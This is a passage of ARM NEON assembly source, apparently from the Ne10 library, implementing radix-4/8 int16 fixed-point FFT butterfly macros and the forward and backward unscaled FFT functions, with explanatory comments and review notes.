vhadd.s16 d_out3_r37, d_s1_r2, d_s3_i2
vhsub.s16 d_out3_i37, d_s1_i2, d_s3_r2
.else
/* out1 = (s1 - j*s3)/2, out3 = (s1 + j*s3)/2 */
vhadd.s16 d_out1_r15, d_s1_r2, d_s3_i2
vhsub.s16 d_out1_i15, d_s1_i2, d_s3_r2
vhsub.s16 d_out3_r37, d_s1_r2, d_s3_i2
vhadd.s16 d_out3_i37, d_s1_i2, d_s3_r2
.endif
.else
/* scaled_flag is false*/
vadd.s16 q_s0_2, q_in0_01, q_in2_01    /* s0 = in0 + in2 */
vsub.s16 q_s1_2, q_in0_01, q_in2_01    /* s1 = in0 - in2 */
vld2.16 {q_in0_01}, [p_fin0:64]!       /* prefetch next iteration */
vld2.16 {q_in2_01}, [p_fin2:64]!
vadd.s16 q_s2_2, q_in1_01, q_in3_01    /* s2 = in1 + in3 */
vsub.s16 q_s3_2, q_in1_01, q_in3_01    /* s3 = in1 - in3 */
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
vsub.s16 q_out2_2, q_s0_2, q_s2_2      /* out2 = s0 - s2 */
vadd.s16 q_out0_2, q_s0_2, q_s2_2      /* out0 = s0 + s2 */
.ifeqs "\inverse", "TRUE"
/* out1 = s1 + j*s3, out3 = s1 - j*s3 */
vsub.s16 d_out1_r15, d_s1_r2, d_s3_i2
vadd.s16 d_out1_i15, d_s1_i2, d_s3_r2
vadd.s16 d_out3_r37, d_s1_r2, d_s3_i2
vsub.s16 d_out3_i37, d_s1_i2, d_s3_r2
.else
/* out1 = s1 - j*s3, out3 = s1 + j*s3 */
vadd.s16 d_out1_r15, d_s1_r2, d_s3_i2
vsub.s16 d_out1_i15, d_s1_i2, d_s3_r2
vsub.s16 d_out3_r37, d_s1_r2, d_s3_i2
vadd.s16 d_out3_i37, d_s1_i2, d_s3_r2
.endif
.endif
/*
 * 4x4 transpose so each butterfly's four outputs land contiguously:
 * 0 4 8 c 0 1 2 3
 * 1 5 9 d ----> 4 5 6 7
 * 2 6 a e ----> 8 9 a b
 * 3 7 b f c d e f
 */
vtrn.16 q_out0_2, q_out1_2
vtrn.16 q_out2_2, q_out3_2
vtrn.32 q_out0_2, q_out2_2
vtrn.32 q_out1_2, q_out3_2
vst2.16 {q_out0_2}, [p_tmp]!
vst2.16 {q_out1_2}, [p_tmp]!
vst2.16 {q_out2_2}, [p_tmp]!
vst2.16 {q_out3_2}, [p_tmp]!
.endm
/*
 * BUTTERFLY4X4_WITH_TWIDDLES scaled_flag, inverse, last_stage
 * One iteration of a twiddled radix-4 stage, 4 butterflies at a time.
 * q_fin0..q_fin3 and d_tw0..d_tw2 must be pre-loaded by the caller;
 * this macro reloads the next iteration's inputs/twiddles while the
 * multiplies are in flight.
 * scr1..3 = fin1..3 * tw0..2 (inverse: * conj(tw)), computed as
 * 32-bit products and narrowed back to Q15 with round-to-nearest
 * (vrshrn #15); fin0 needs no twiddle (tw = 1).
 * scaled_flag "TRUE": halving add/sub, i.e. the stage output is
 * scaled by 1/4.
 * NOTE(review): the last_stage argument is declared but never
 * referenced in the body.
 */
.macro BUTTERFLY4X4_WITH_TWIDDLES scaled_flag, inverse, last_stage
/* rewind p_in1/p_tw1 past the previous iteration's 4 strided loads,
 * then step forward one 4-complex (16-byte) group */
sub p_in1, p_in1, nstep, lsl #2
add p_in1, p_in1, #16
sub p_tw1, p_tw1, mstep, lsl #1
add p_tw1, p_tw1, #16
vmov q_scr0, q_fin0
/* real/imag partial products: scrN = finN * twN.r (32-bit wide) */
vmull.s16 q_scr1_r, d_fin1_r, d_tw0_r
vmull.s16 q_scr1_i, d_fin1_i, d_tw0_r
vmull.s16 q_scr2_r, d_fin2_r, d_tw1_r
vmull.s16 q_scr2_i, d_fin2_i, d_tw1_r
vmull.s16 q_scr3_r, d_fin3_r, d_tw2_r
vmull.s16 q_scr3_i, d_fin3_i, d_tw2_r
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
.ifeqs "\inverse", "TRUE"
/* inverse: multiply by conj(tw): r += fi*twi, i -= fr*twi */
vmlal.s16 q_scr1_r, d_fin1_i, d_tw0_i
vmlsl.s16 q_scr1_i, d_fin1_r, d_tw0_i
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vmlal.s16 q_scr2_r, d_fin2_i, d_tw1_i
vmlsl.s16 q_scr2_i, d_fin2_r, d_tw1_i
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vmlal.s16 q_scr3_r, d_fin3_i, d_tw2_i
vmlsl.s16 q_scr3_i, d_fin3_r, d_tw2_i
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
.else
/* forward: full complex multiply: r -= fi*twi, i += fr*twi */
vmlsl.s16 q_scr1_r, d_fin1_i, d_tw0_i
vmlal.s16 q_scr1_i, d_fin1_r, d_tw0_i
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vmlsl.s16 q_scr2_r, d_fin2_i, d_tw1_i
vmlal.s16 q_scr2_i, d_fin2_r, d_tw1_i
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vmlsl.s16 q_scr3_r, d_fin3_i, d_tw2_i
vmlal.s16 q_scr3_i, d_fin3_r, d_tw2_i
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
.endif
/* narrow the 32-bit products back to Q15 with rounding */
vrshrn.i32 d_scr1_r, q_scr1_r, #15
vrshrn.i32 d_scr1_i, q_scr1_i, #15
vrshrn.i32 d_scr2_r, q_scr2_r, #15
vrshrn.i32 d_scr2_i, q_scr2_i, #15
vrshrn.i32 d_scr3_r, q_scr3_r, #15
vrshrn.i32 d_scr3_i, q_scr3_i, #15
.ifeqs "\scaled_flag", "TRUE"
/* radix-4 recombination, halving each level (output scaled by 1/4) */
vhadd.s16 q_scr4, q_scr0, q_scr2
vhsub.s16 q_scr5, q_scr0, q_scr2
vhadd.s16 q_scr6, q_scr1, q_scr3
vhsub.s16 q_scr7, q_scr1, q_scr3
vhadd.s16 q_fout0, q_scr4, q_scr6
vhsub.s16 q_fout2, q_scr4, q_scr6
.ifeqs "\inverse", "TRUE"
vhsub.s16 d_fout1_r, d_scr5_r, d_scr7_i
vhadd.s16 d_fout1_i, d_scr5_i, d_scr7_r
vhadd.s16 d_fout3_r, d_scr5_r, d_scr7_i
vhsub.s16 d_fout3_i, d_scr5_i, d_scr7_r
.else
vhadd.s16 d_fout1_r, d_scr5_r, d_scr7_i
vhsub.s16 d_fout1_i, d_scr5_i, d_scr7_r
vhsub.s16 d_fout3_r, d_scr5_r, d_scr7_i
vhadd.s16 d_fout3_i, d_scr5_i, d_scr7_r
.endif
.else
/* radix-4 recombination, full precision */
vadd.s16 q_scr4, q_scr0, q_scr2
vsub.s16 q_scr5, q_scr0, q_scr2
vadd.s16 q_scr6, q_scr1, q_scr3
vsub.s16 q_scr7, q_scr1, q_scr3
vadd.s16 q_fout0, q_scr4, q_scr6
vsub.s16 q_fout2, q_scr4, q_scr6
.ifeqs "\inverse", "TRUE"
vsub.s16 d_fout1_r, d_scr5_r, d_scr7_i
vadd.s16 d_fout1_i, d_scr5_i, d_scr7_r
vadd.s16 d_fout3_r, d_scr5_r, d_scr7_i
vsub.s16 d_fout3_i, d_scr5_i, d_scr7_r
.else
vadd.s16 d_fout1_r, d_scr5_r, d_scr7_i
vsub.s16 d_fout1_i, d_scr5_i, d_scr7_r
vsub.s16 d_fout3_r, d_scr5_r, d_scr7_i
vadd.s16 d_fout3_i, d_scr5_i, d_scr7_r
.endif
.endif
/* store the 4 outputs mstep bytes apart, then rewind and advance to
 * the next 4-complex group */
vst2.16 {d_fout0_r, d_fout0_i}, [p_out1], mstep
vst2.16 {d_fout1_r, d_fout1_i}, [p_out1], mstep
vst2.16 {d_fout2_r, d_fout2_i}, [p_out1], mstep
vst2.16 {d_fout3_r, d_fout3_i}, [p_out1], mstep
sub p_out1, p_out1, mstep, lsl #2
add p_out1, p_out1, #16
.endm
/*
 * BUTTERFLY8X4_WITHOUT_TWIDDLES scaled_flag, inverse
 * One iteration of the first-stage radix-8 butterfly, 4 butterflies
 * at a time.  Loads its own 8 complex-s16 input vectors (fstep bytes
 * apart), combines them as radix-4 + radix-2 passes, applies the
 * +/-45-degree twiddles (+-1/sqrt(2) in Q15, from .L_TW_81_16, via
 * vqdmulh), transposes 4x4, and stores through p_out1.
 * scaled_flag "TRUE": inputs are pre-shifted >>3 (divide by 8) so
 * the whole radix-8 pass cannot overflow s16.
 */
.macro BUTTERFLY8X4_WITHOUT_TWIDDLES scaled_flag, inverse
/**
 * q_in0: Fin1[0]
 * q_in1: Fin1[0 + fstride]
 * q_in2: Fin1[fstride1]
 * q_in3: Fin1[fstride1 + fstride]
 * q_in4: Fin1[fstride1*2]
 * q_in5: Fin1[fstride1*2 + fstride]
 * q_in6: Fin1[fstride1*3]
 * q_in7: Fin1[fstride1*3 + fstride]
 *
 */
adr tmp0, .L_TW_81_16                  /* tmp0 -> Q15 +-1/sqrt(2) pair */
vld2.16 {d_in0_r, d_in0_i}, [p_in1:64], fstep
vld2.16 {d_in2_r, d_in2_i}, [p_in1:64], fstep
vld2.16 {d_in4_r, d_in4_i}, [p_in1:64], fstep
vld2.16 {d_in6_r, d_in6_i}, [p_in1:64], fstep
vld2.16 {d_in1_r, d_in1_i}, [p_in1:64], fstep
vld2.16 {d_in3_r, d_in3_i}, [p_in1:64], fstep
vld2.16 {d_in5_r, d_in5_i}, [p_in1:64], fstep
vld2.16 {d_in7_r, d_in7_i}, [p_in1:64], fstep
.ifeqs "\scaled_flag", "TRUE"
/* pre-scale by 1/8 so the radix-8 combination cannot overflow */
vshr.s16 q_in0, q_in0, 3
vshr.s16 q_in1, q_in1, 3
vshr.s16 q_in2, q_in2, 3
vshr.s16 q_in3, q_in3, 3
vshr.s16 q_in4, q_in4, 3
vshr.s16 q_in5, q_in5, 3
vshr.s16 q_in6, q_in6, 3
vshr.s16 q_in7, q_in7, 3
.endif
// radix 4 butterfly without twiddles
vadd.s16 q_sin0, q_in0, q_in1
vsub.s16 q_sin1, q_in0, q_in1
vld1.16 {d_tw_twn}, [tmp0]             /* s16 lanes [0]=+23169, [2]=-23169 */
vadd.s16 q_sin2, q_in2, q_in3
vsub.s16 q_sin3, q_in2, q_in3
vadd.s16 q_sin4, q_in4, q_in5
vsub.s16 q_sin5, q_in4, q_in5
vadd.s16 q_sin6, q_in6, q_in7
vsub.s16 q_sin7, q_in6, q_in7
.ifeqs "\inverse", "TRUE"
/* sin5 <- +j*sin5 (negate imag, then swap re/im below);
 * s3 <- sin3*(1+j), s7 <- sin7*(1-j) before the 1/sqrt(2) scaling */
vneg.s16 d_sin5_i, d_sin5_i
vsub.s16 d_s3_r, d_sin3_r, d_sin3_i
vadd.s16 d_s3_i, d_sin3_i, d_sin3_r
vadd.s16 d_s7_r, d_sin7_r, d_sin7_i
vsub.s16 d_s7_i, d_sin7_i, d_sin7_r
.else
/* sin5 <- -j*sin5 (negate real, then swap re/im below);
 * s3 <- sin3*(1-j), s7 <- sin7*(1+j) before the 1/sqrt(2) scaling */
vneg.s16 d_sin5_r, d_sin5_r
vadd.s16 d_s3_r, d_sin3_r, d_sin3_i
vsub.s16 d_s3_i, d_sin3_i, d_sin3_r
vsub.s16 d_s7_r, d_sin7_r, d_sin7_i
vadd.s16 d_s7_i, d_sin7_i, d_sin7_r
.endif
vswp d_sin5_r, d_sin5_i
/* scale by +1/sqrt(2) (lane 0) and -1/sqrt(2) (lane 2); vqdmulh
 * doubles the high half, so 23169 acts as ~0.7071 */
vqdmulh.s16 q_s3, q_s3, d_tw_twn[0]
vqdmulh.s16 q_s7, q_s7, d_tw_twn[2]
// radix 2 butterfly
vadd.s16 q_s8, q_sin0, q_sin4
vadd.s16 q_s9, q_sin1, q_sin5
vsub.s16 q_s10, q_sin0, q_sin4
vsub.s16 q_s11, q_sin1, q_sin5
// radix 2 butterfly
vadd.s16 q_s12, q_sin2, q_sin6
vadd.s16 q_s13, q_s3, q_s7
vsub.s16 q_s14, q_sin2, q_sin6
vsub.s16 q_s15, q_s3, q_s7
vsub.s16 q_out4, q_s8, q_s12
vsub.s16 q_out5, q_s9, q_s13
vadd.s16 q_out0, q_s8, q_s12
vadd.s16 q_out1, q_s9, q_s13
.ifeqs "\inverse", "TRUE"
vsub.s16 d_out2_r, d_s10_r, d_s14_i
vadd.s16 d_out2_i, d_s10_i, d_s14_r
vsub.s16 d_out3_r, d_s11_r, d_s15_i
vadd.s16 d_out3_i, d_s11_i, d_s15_r
vadd.s16 d_out6_r, d_s10_r, d_s14_i
vsub.s16 d_out6_i, d_s10_i, d_s14_r
vadd.s16 d_out7_r, d_s11_r, d_s15_i
vsub.s16 d_out7_i, d_s11_i, d_s15_r
.else
vadd.s16 d_out2_r, d_s10_r, d_s14_i
vsub.s16 d_out2_i, d_s10_i, d_s14_r
vadd.s16 d_out3_r, d_s11_r, d_s15_i
vsub.s16 d_out3_i, d_s11_i, d_s15_r
vsub.s16 d_out6_r, d_s10_r, d_s14_i
vadd.s16 d_out6_i, d_s10_i, d_s14_r
vsub.s16 d_out7_r, d_s11_r, d_s15_i
vadd.s16 d_out7_i, d_s11_i, d_s15_r
.endif
/* 4x4 transpose of each out pair so results store in natural order */
vtrn.16 q_out0, q_out1
vtrn.16 q_out2, q_out3
vtrn.16 q_out4, q_out5
vtrn.16 q_out6, q_out7
vtrn.32 q_out0, q_out2
vtrn.32 q_out1, q_out3
vtrn.32 q_out4, q_out6
vtrn.32 q_out5, q_out7
vst2.16 {q_out0}, [p_out1]!
vst2.16 {q_out4}, [p_out1]!
vst2.16 {q_out1}, [p_out1]!
vst2.16 {q_out5}, [p_out1]!
vst2.16 {q_out2}, [p_out1]!
vst2.16 {q_out6}, [p_out1]!
vst2.16 {q_out3}, [p_out1]!
vst2.16 {q_out7}, [p_out1]!
/* rewind p_in1 past the 8 strided loads, advance one 4-complex group */
sub p_in1, p_in1, fstep, lsl #3
add p_in1, p_in1, #16
.endm
/*
 * +-1/sqrt(2) in Q15 (23169 ~ 0.7071 * 32768), the 45-degree twiddle
 * used by BUTTERFLY8X4_WITHOUT_TWIDDLES.  Loaded as one D register:
 * s16 lanes [0] and [2] hold +23169 / -23169 (lanes 1 and 3 are the
 * words' high halves and are never referenced).
 */
.align 4
.L_TW_81_16:
.word 23169
.word -23169
/**
* @details This function implements a radix-4/8 forwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
/*
 * ne10_mixed_radix_fft_forward_int16_unscaled_neon
 * Forward mixed radix-4/8 int16 FFT, unscaled (no per-stage shift).
 * In: r0 = Fout, r1 = Fin, r2 = factors, r3 = twiddles; the stack
 * argument read below at [sp,#104] (= 40 bytes of r4-r12,lr plus
 * 64 bytes of q4-q7 pushed on top of it) is a temporary buffer used
 * for input/output ping-pong between stages.
 * First stage is radix-8 when factors[2*stage_count] == 8, else
 * radix-4; all remaining stages are twiddled radix-4, with the last
 * stage writing to the saved original Fout.
 * NOTE(review): argument roles are inferred from the register
 * aliases at the top of the file -- confirm against the C prototype.
 */
.align 4
.global ne10_mixed_radix_fft_forward_int16_unscaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_forward_int16_unscaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_unscaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #3 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #2 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #2 /* get the address of F[fstride*3] */
/* prime the pipeline: the macro consumes these and reloads the next set */
vld2.16 {q_in0_01}, [p_fin0:64]!
vld2.16 {q_in2_01}, [p_fin2:64]!
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_unscaled_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "FALSE", "FALSE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_unscaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104] /* 5th argument (temp buffer): above 40+64 pushed bytes */
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #2 /* byte stride between butterfly inputs */
lsr fstride, fstride, #2
/* if the last stage */
cmp stage_count, #0
beq .L_ne10_butterfly_unscaled_last_stages
bne .L_ne10_butterfly_unscaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_unscaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #2 /* byte stride between the 8 loads */
.L_ne10_radix8_butterfly_unscaled_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "FALSE", "FALSE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_unscaled_first_stage_fstride1
lsl nstep, fstride, #3
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104] /* 5th argument (temp buffer) */
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_unscaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_unscaled_other_stages:
lsl mstep, mstride, #2
mov p_in1, p_fin
/* prime the pipeline for BUTTERFLY4X4_WITH_TWIDDLES */
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_unscaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #4 /* p_out1 = Fout + (f index)*mstride*4 cpx */
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_unscaled_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_unscaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_unscaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #3
add p_twiddles, p_twiddles, mstride, lsl #2 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_unscaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_unscaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls /* write final results to the caller's Fout */
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_unscaled_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_unscaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_unscaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_forward_int16_unscaled_neon */
/**
* @details This function implements a radix-4/8 backwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
/*
 * ne10_mixed_radix_fft_backward_int16_unscaled_neon
 * Backward (inverse) mixed radix-4/8 int16 FFT, unscaled.  Identical
 * control flow to the forward unscaled variant; only the macro
 * "inverse" flag differs (conjugated twiddles / opposite j rotation).
 * In: r0 = Fout, r1 = Fin, r2 = factors, r3 = twiddles; [sp,#104]
 * (above the 40+64 pushed bytes) = temporary ping-pong buffer.
 * NOTE(review): argument roles inferred from the register aliases --
 * confirm against the C prototype.
 */
.align 4
.global ne10_mixed_radix_fft_backward_int16_unscaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_backward_int16_unscaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_inverse_unscaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #3 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #2 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #2 /* get the address of F[fstride*3] */
/* prime the pipeline: the macro consumes these and reloads the next set */
vld2.16 {q_in0_01}, [p_fin0:64]!
vld2.16 {q_in2_01}, [p_fin2:64]!
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_inverse_unscaled_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "FALSE", "TRUE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_inverse_unscaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104] /* 5th argument (temp buffer): above 40+64 pushed bytes */
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #2 /* byte stride between butterfly inputs */
lsr fstride, fstride, #2
/* if the last stage */
cmp stage_count, #0
beq .L_ne10_butterfly_inverse_unscaled_last_stages
bne .L_ne10_butterfly_inverse_unscaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_unscaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #2 /* byte stride between the 8 loads */
.L_ne10_radix8_butterfly_inverse_unscaled_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "FALSE", "TRUE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_inverse_unscaled_first_stage_fstride1
lsl nstep, fstride, #3
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104] /* 5th argument (temp buffer) */
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_unscaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_unscaled_other_stages:
lsl mstep, mstride, #2
mov p_in1, p_fin
/* prime the pipeline for BUTTERFLY4X4_WITH_TWIDDLES */
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_unscaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #4 /* p_out1 = Fout + (f index)*mstride*4 cpx */
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_unscaled_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_unscaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_unscaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #3
add p_twiddles, p_twiddles, mstride, lsl #2 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_unscaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_unscaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls /* write final results to the caller's Fout */
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_unscaled_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_unscaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_unscaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_backward_int16_unscaled_neon */
/**
* @details This function implements a radix-4/8 forwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
/*
 * ne10_mixed_radix_fft_forward_int16_scaled_neon
 * Forward mixed radix-4/8 int16 FFT, scaled: every stage divides its
 * output (halving adds in the radix-4 macros, >>3 pre-shift in the
 * radix-8 macro) to keep values inside s16 range.  Control flow is
 * identical to the unscaled forward variant; only the macro
 * "scaled_flag" differs.
 * In: r0 = Fout, r1 = Fin, r2 = factors, r3 = twiddles; [sp,#104]
 * (above the 40+64 pushed bytes) = temporary ping-pong buffer.
 * NOTE(review): argument roles inferred from the register aliases --
 * confirm against the C prototype.
 */
.align 4
.global ne10_mixed_radix_fft_forward_int16_scaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_forward_int16_scaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
